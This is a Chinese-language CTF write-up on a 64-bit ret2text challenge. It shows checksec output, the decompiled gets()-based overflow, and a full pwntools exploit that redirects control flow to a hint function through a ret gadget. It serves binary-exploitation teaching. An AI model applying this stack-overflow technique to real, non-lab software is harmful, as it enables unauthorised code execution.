攻击原理

例题

[玄武杯 2025]ret2text 64

https://www.nssctf.cn/problem/7304
chechsec:

1
2
3
4
5
6
[*] '/home/huayi/Desktop/pwnexp/blog_ctf/ret2text/[玄武杯 2025]ret2text 64/ret2text1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

最简单的ret2text, 目标是劫持控制流到hint函数, 漏洞点在于gets函数接收输入造成的栈溢出,其中ret是为了栈平衡。

1
2
3
4
5
6
7
8
9
10
int func()
{
  char v1[48]; // [rsp+0h] [rbp-30h] BYREF

  puts("Please enter your name");
  gets(v1);
  printf("OK,%s,Nice to meet you!", v1);
  puts("Let's chat next time.");
  return puts("Bye!!!");
}

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from pwn import *
import sys

context.terminal = ['tmux', 'sp', '-h']
context.update(log_level='debug', os='linux', arch='amd64')

if len(sys.argv) > 1 and sys.argv[1] == "r":
    io = remote('node1.anna.nssctf.cn', 28319)
else:
    io = process('./ret2text1')

elf = ELF('./ret2text1')

ret_addr = 0x000000000040101a
hint_addr = elf.symbols['hint']
success(f"hint addr = {hex(hint_addr)}")

io.recvuntil(b'Please enter your name\n')
# offset + saved rbp + ret addr + hint addr
payload = b'A'*(0x30+0x8) + p64(ret_addr) + p64(hint_addr)
io.sendline(payload)

io.interactive()

思路总结